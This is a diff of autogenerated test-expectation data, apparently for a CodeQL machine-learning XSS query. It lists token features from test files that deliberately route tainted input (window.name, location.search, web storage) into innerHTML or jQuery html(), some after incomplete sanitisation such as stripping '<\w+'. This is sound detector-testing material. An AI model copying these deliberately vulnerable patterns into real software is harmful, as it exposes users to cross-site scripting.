    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:9:43:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:9:43:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:9:43:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:9:43:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:9:43:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:21:43:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15148,12 +108684,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:43:39:43:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:39:43:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:43:39:43:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:5:45:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:9:45:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:9:45:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:9:45:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:9:45:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:9:45:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:21:45:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15172,12 +108733,52 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:45:39:45:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:39:45:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:45:39:45:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:5 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:5 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:5 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:5 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:5 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:15 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:15 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:15 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:15 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:15 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:46 | elt.inn ... /g, '') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:46 | elt.inn ... /g, '') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:46 | elt.inn ... /g, '') | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:46 | elt.inn ... /g, '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:3:48:46 | elt.inn ... /g, '') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:7:48:15 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:7:48:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:7:48:15 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:7:48:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:7:48:15 | innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:25 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:25 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:25 | tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:25 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:25 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:33 | tainted.replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:33 | tainted.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:33 | tainted.replace | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:33 | tainted.replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:33 | tainted.replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | exceptional return of tainted ... /g, '') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | exceptional return of tainted ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | exceptional return of tainted ... /g, '') | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | exceptional return of tainted ... /g, '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | exceptional return of tainted ... /g, '') | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:19:48:46 | tainted ... /g, '') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:27:48:33 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:27:48:33 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:27:48:33 | replace | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:27:48:33 | replace | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:48:27:48:33 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:35:48:41 | /<\\w+/g | CalleeFlexibleAccessPath | tainted.replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:35:48:41 | /<\\w+/g | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:35:48:41 | /<\\w+/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -15194,6 +108795,60 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:48:44:48:45 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:44:48:45 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:48:44:48:45 | '' | receiverName | tainted | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:30:2 | (functi ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:30:2 | (functi ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:1:30:2 | (functi ... / OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:1:1 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:1:1 | this | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:1:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | exceptional return of anonymous function | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | functio ... // OK\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | functio ... // OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | return of anonymous function | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:1:2:30:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:18 | sessionStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:18 | sessionStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:18 | sessionStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:18 | sessionStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:18 | sessionStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:26 | session ... setItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:26 | session ... setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:26 | session ... setItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:26 | session ... setItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:26 | session ... setItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | exceptional return of session ... search) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | exceptional return of session ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | exceptional return of session ... search) | 